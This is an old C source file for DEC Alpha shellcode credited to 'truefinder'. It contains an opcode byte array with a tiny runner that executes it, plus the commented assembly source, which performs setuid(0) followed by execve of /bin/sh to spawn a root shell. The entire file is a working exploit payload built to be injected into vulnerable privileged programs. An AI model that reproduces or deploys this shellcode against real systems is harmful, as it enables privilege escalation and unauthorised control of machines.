/*
 :
 : setuid(0);
 : execve("/bin/sh", ... );
 :
 : truefinder, seo@igrus.inha.ac.kr
 :
 */

char code[] =
  "\x58\xfe\xde\x23\x0f\x04\xde\x47\x04\x74\xf0\x43\xa4\x01\x8f\xb0"
  "\xa4\x01\x4f\x21\xfb\x6b\x3f\x24\x01\x80\x21\x20\xa8\x01\x2f\xb4"
  "\x10\x04\xff\x47\x80\xf4\xe2\x47\xff\x7f\x4a\x6b\x69\x6e\x3f\x24"
  "\x2f\x62\x21\x20\x73\x68\x5f\x24\xff\x2f\x42\x20\x82\x16\x41\x48"
  "\x90\x01\x2f\xb0\x94\x01\x4f\xb0\x98\x01\xef\xb5\xa0\x01\xef\xb7"
  "\x90\x01\x0f\x22\x98\x01\x2f\x22\x12\x04\xff\x47\x80\x74\xe7\x47"
  "\xff\x7f\xea\x6b";

void (*f)();
main()
{
  f = code;
  f();
}

/* ++ dec-alpha-set0sh.s ++

.text
        .globl main
        .ent main
main:
        subq $sp,424,$sp
        mov $sp,$fp

call_pal_here:
        addq $31,0x83,$4
        stl $4, 420($fp)
        addq $fp,420,$10
ret_here:
        mov 0x6bfa8001,$1
        stq $1, 424($fp)

setuid_here:
        bis $31,$31, $16
        cmoveq $31,0x17,$0
        jsr $26,($10),0xffff

        mov 0x6e69622f, $1
        mov 0x68732fff, $2
        srl $2, 0x08, $2
        stl $1, 400($fp)
        stl $2, 404($fp)
        stq $fp,408($fp)
        stq $31,416($fp)

        lda $16, 400($fp)
        lda $17, 408($fp)
        clr $18


        cmoveq $31,0x3b,$0
        jsr $31,($10),0xffff

        .end main

.ascii "setuid(0); execve("sh",..);"
.ascii "jmp to $10 is 0x00000083, 0x6bfa8001 ( ret )"
.ascii "2001/06/24"
.ascii "truefinder"

-- dec-alpha-set0sh.s -- */